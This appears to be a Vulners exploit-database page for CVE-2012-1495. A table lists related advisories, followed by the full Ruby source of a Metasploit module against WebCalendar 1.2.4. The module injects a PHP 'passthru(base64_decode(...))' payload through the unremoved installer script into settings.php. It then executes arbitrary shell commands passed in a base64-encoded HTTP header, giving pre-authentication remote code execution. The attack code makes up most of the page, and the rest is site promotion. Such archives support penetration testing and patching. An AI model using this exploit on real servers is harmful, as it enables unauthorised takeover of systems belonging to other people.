| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution | 23 Apr 201200:00 | – | zdt | |
| WebCalendar 1.2.4 Pre-Auth Remote Code Injection | 29 Apr 201200:00 | – | zdt | |
| WebCalendar -- multiple vulnerabilities | 28 Apr 201200:00 | – | freebsd | |
| CVE-2012-1495 | 23 Apr 201200:00 | – | circl | |
| CVE-2012-1495 | 27 Jan 202014:39 | – | cve | |
| CVE-2012-1495 | 27 Jan 202014:39 | – | cvelist | |
| WebCalendar 1.2.4 RCE | 10 May 201200:00 | – | dsquare | |
| WebCalendar 1.2.4 - Remote Code Execution | 23 Apr 201200:00 | – | exploitdb | |
| WebCalendar 1.2.4 - Remote Code Execution | 23 Apr 201200:00 | – | exploitpack | |
| FreeBSD : WebCalendar -- multiple vulnerabilities (18dffa02-946a-11e1-be9d-000c29cc39d3) | 3 May 201200:00 | – | nessus |
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
'Description' => %q{
This modules exploits a vulnerability found in WebCalendar, version 1.2.4 or
less. If not removed, the settings.php script meant for installation can be
update by an attacker, and then inject code in it. This allows arbitrary code
execution as www-data.
},
'License' => MSF_LICENSE,
'Author' =>
[
'EgiX', #Initial discovery & PoC
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2012-1495'],
['URL', '18775']
],
'Arch' => ARCH_CMD,
'Platform' => ['unix', 'linux'],
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Targets' =>
[
['WebCalendar 1.2.4 on Linux', {}],
],
'Privileged' => false,
'DisclosureDate' => "Apr 23 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to webcalendar', '/WebCalendar-1.2.4/'])
], self.class)
end
def check
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}/login.php"
})
if res and res.body =~ /WebCalendar v1.2.\d/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
peer = "#{rhost}:#{rport}"
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
print_status("#{peer} - Housing php payload...")
# Allow commands to be passed as a header.
# We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff.
post_data = "app_settings=1"
post_data << "&form_user_inc=user.php"
post_data << "&form_single_user_login=*/print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;"
post_data << "\n"*2
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}install/index.php",
'data' => post_data
})
print_status("#{peer} - Loading our payload...")
# Execute our payload
send_request_raw({
'method' => 'GET',
'uri' => "#{uri}includes/settings.php",
'headers' => {
'Cmd' => Rex::Text.encode_base64(payload.encoded)
}
})
handler
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation